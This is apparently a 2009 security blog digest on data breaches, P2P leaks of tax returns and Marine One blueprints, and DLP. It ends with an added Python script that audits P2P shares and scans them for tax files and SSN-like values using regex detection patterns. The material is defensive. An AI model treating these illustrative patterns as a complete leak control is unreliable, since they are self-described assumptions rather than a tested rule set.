It's no secret that 2009 is promising to be a tough year for nearly everyone. With corporate budgets shrinking, companies are looking to reduce costs by cutting the workforce and/or the number of projects planned/funded. Yet, reports indicate that cybercrime and data breaches have reached new highs, and that organized crime is growing rapidly in the shadows of the digital age.

However, this atmosphere of gloom may be just what the doctor ordered. With less money to spend on security staff and technical controls, companies will have to make do with what they have: people and data. 2009 will be the year of going back to basics and corporations should focus on people and data by creating a company-wide risk management committee involving representatives drawn from leadership positions across every line of business. As Tony Hildesheim, vice president of IT for Washington State Employees Credit Union, said, their risk management committee "goes further in providing increased security awareness, and therefore improved security overall, than any tool we have implemented."

For those companies that find themselves holding an unacceptable level of risk, the popular security controls of 2009 are Data Loss Prevention (DLP), Full Disk Encryption (FDE), and Web Application Firewalls (WAFs).

Src: As the Economy Sinks, Data Breaches Rise | CFO Magazine [tx @PrivacyProf]

The Top 5 Biggest Infosec Lies

While I've always wanted to write something like this, Aaron Hughes, President and CEO of IAC SecureTech and President of Vidoc Razor, beat me to it. A quick read but definitely worth it.
5. There is no evidence that the data has been misused….
4. It was a sophisticated attack….
3. Of course it is secure - the (Military/Law Enforcement/Government) uses this, so it has to be….
2. We have “Insert favorite technology here” so we know we are all set….
1. We are compliant with (HIPAA, GLB, Sarbanes-Oxley, PCI, etc.) so we know we are secure….

Src: The Top 5 Biggest Infosec Lies | INFO[rmation fo]RENSICS

QOTD on cybercrime and security tech

This article contains a powerful and very accurate quote by Ken Dunham, director of global response at iSight Partners, on cybercrime and security technologies:
The sophistication and automation of financially motivated cybercrime is very steep today when compared with counter-efforts... Criminals are agile and able to outpace the rate of adoption of counter-technologies in the marketplace.
Src: As the Economy Sinks, Data Breaches Rise | CFO Magazine [tx @PrivacyProf]

2009 The Year of Outsourcing Dangerously

This nine-page report on the dangers of outsourcing in 2009 is a must-read for anyone whose organization is considering outsourcing options. It contains various nuggets of useful information, from a ranked list of the best (and worst) countries to an assessment of various offshore locations (safe vs. risky) across ten areas:
  1. Support for capitalism
  2. Corruption & organized crime
  3. Geopolitical conditions
  4. Economy & currency
  5. Law enforcement
  6. IT infrastructure
  7. Environmental laws
  8. Terrorism
  9. Maturity of legal system
  10. Climate
Src: The Black Book of Outsourcing [tx @PrivacyProf]
Direct link: 2009 The Year of Outsourcing Dangerously (PDF)

Some file-sharing clients open users to identity theft

On March 1, 2009, NBC's Natalie Morales reported on Nightly News about the dangers that Peer-to-Peer (P2P) software users face. The family they interviewed used a P2P program (still popular with the teenage crowd) which, unbeknownst to them, was leaking tax return information onto the P2P network.

There are two ways that P2P programs can lead to data leakage: one is user misconfiguration, the other is software flaws. The first is somewhat easy to fix: if, after learning about the dangers of P2P programs, you still find a need to use them, be sure to configure the software so that it does not share your entire hard drive but only designated files and folders, and then verify the share list actually matches what you intended. The second, software flaws, is something the software engineering and information security communities have been trying to solve for several decades with no end in sight.

However, this story opens up another worrisome aspect related to taxes: the small and medium-sized CPAs and tax accountants all over the country whom customers entrust with preparing their taxes. Tax returns are rich with personal information and need to be appropriately secured. Next time you drop off your tax records, ask how your information will be protected. If instead you find yourself doing your own taxes, be sure to safeguard any data files and/or PDF documents you generate by encrypting them or storing them off the main computer (e.g. in a safe, preferably encrypted as well).

Src: Some file-sharing clients open users to identity theft | msnbc.com [video]
Alternate link

Carrot-sticks and security | Layer 8

This article discusses the various avenues available to an Information Security Officer (ISO) who has just discovered that an employee has been visiting "naughty sites and saving certain files locally."

The utility of this article is in the subtleties of each of the options available to the ISO. Every ISO should read it.

Src: Carrot-sticks and security | Layer 8

Waledac malware adds geolocation

Waledac now has another weapon to lure users into installing it: geolocation-based ads. This feature serves what appear to be local ads or coupons, which in turn increases the appearance of being a legitimate service.

Src: Waledac malware adds geolocation - SC Magazine US

Dr.InfoSec on Making a difference

As a faculty member, one of my hopes is that I can make a difference in the lives of the students that I get to have in class. A former student, now clearly on his way to a successful career in Information Security, said to me just this week: "I probably wouldn't be in this field [infosec] if not for your classes."

Getting to see this student mingle with various infosec professionals and knowing that I had something to do with it is its own reward.

Why Do Bad Things Happen to PCI-Compliant Companies?

This article dates back to 10/24/2008, yet in light of the recent breaches including Heartland Payment Systems, is still very much on topic.

Src: Why Do Bad Things Happen to PCI-Compliant Companies?

Marine One blueprints and avionics leaked to Iran through peer-to-peer network

It seems a military contractor allowed a file containing sensitive data about Marine One to be shared over a Peer-to-Peer (P2P) network. The file was tracked making its way to an IP address in Iran; it contained highly sensitive blueprints for Marine One, including details about the helicopter and its avionics packages.

With the proliferation of "sharing" technologies such as P2P and SharePoint sites, the need for Data Loss Prevention (DLP) is growing. While DLP solutions are still maturing, entities housing sensitive information should take another look at what is running inside their networks and start looking into what is leaving their networks as well.

Many of these sharing technologies are set up by regular users rather than being installed and managed by IT, following a documented process and with a documented business need. This often leads to misconfigured settings that allow far too much access to information.

Src: Marine One blueprints and avionics leaked to Iran through peer-to-peer network | The Raw Story [tx to @geekgrrl]
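The two P2P items above (the family's leaked tax return and the Marine One blueprints) share one root cause: a share that is far broader than intended, holding files nobody checked. The following is an added example, not code from this blog or from any P2P client, of the kind of local audit a practitioner would run before (or instead of) buying a DLP product: it flags shares that expose the whole user profile or drive root, then scans the shared tree for tax-software files, suggestive file names and SSN-like values. The file patterns and the sample directory tree are constructed assumptions for illustration.

```python
import re
import tempfile
from pathlib import Path

# Illustrative detection rules (assumptions, not a vendor DLP rule set).
SENSITIVE_NAMES = re.compile(r"(1040|w-?2|1099|tax|return|ssn|payroll)", re.IGNORECASE)
SENSITIVE_EXT = {".tax", ".txf", ".qfx", ".ofx", ".tax2008"}
# US SSN with its structural rules: area not 000/666/9xx, group not 00, serial not 0000.
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")


def _contains(parent, child):
    """True if child is parent itself or lies somewhere beneath it."""
    parent, child = Path(parent).resolve(), Path(child).resolve()
    return child == parent or parent in child.parents


def overbroad_shares(shares, protected_roots):
    """Shares that are, or sit above, a root that must never be shared whole."""
    return [s for s in shares if any(_contains(s, r) for r in protected_roots)]


def scan_share(share, max_bytes=1 << 20):
    """Walk a shared folder; return (relative path, reasons) for suspect files."""
    findings = []
    for path in sorted(Path(share).rglob("*")):
        if not path.is_file():
            continue
        reasons = []
        if path.suffix.lower() in SENSITIVE_EXT:
            reasons.append("tax-software file")
        if SENSITIVE_NAMES.search(path.stem):
            reasons.append("sensitive file name")
        try:
            text = path.read_bytes()[:max_bytes].decode("utf-8", "ignore")
        except OSError:
            text = ""
        hits = SSN_RE.findall(text)
        if hits:
            reasons.append(f"{len(hits)} SSN-like value(s)")
        if reasons:
            findings.append((str(path.relative_to(share)), reasons))
    return findings


def build_sample_tree():
    """Constructed throwaway home directory mimicking the NBC story's setup."""
    home = Path(tempfile.mkdtemp(prefix="p2p_audit_"))
    docs, shared = home / "Documents", home / "Shared"
    docs.mkdir()
    shared.mkdir()
    (docs / "2008_tax_return.pdf").write_text("Form 1040 ... SSN 123-45-6789 ...")
    (docs / "TurboTax.tax2008").write_bytes(b"\x00\x01")
    (docs / "notes.txt").write_text("grocery list")
    (shared / "vacation.jpg").write_bytes(b"\xff\xd8\xff" + b"\x00" * 16)
    return home


def audit(home, shares):
    """Audit a P2P share list: over-broad shares plus per-share content findings."""
    home = Path(home)
    return {
        "overbroad": overbroad_shares(shares, [home, home.anchor]),
        "findings": {str(s): scan_share(s) for s in shares},
    }


if __name__ == "__main__":
    home = build_sample_tree()
    print("misconfigured:", audit(home, [home]))            # whole profile shared
    print("corrected:   ", audit(home, [home / "Shared"]))  # designated folder only
```

The misconfigured run reports the profile itself as over-broad and surfaces the tax return and TurboTax file under Documents; the corrected run, sharing only the designated folder, returns nothing. Content scanning is deliberately limited to the first megabyte of each file and decodes leniently, so binary tax-software files are caught by extension rather than by content.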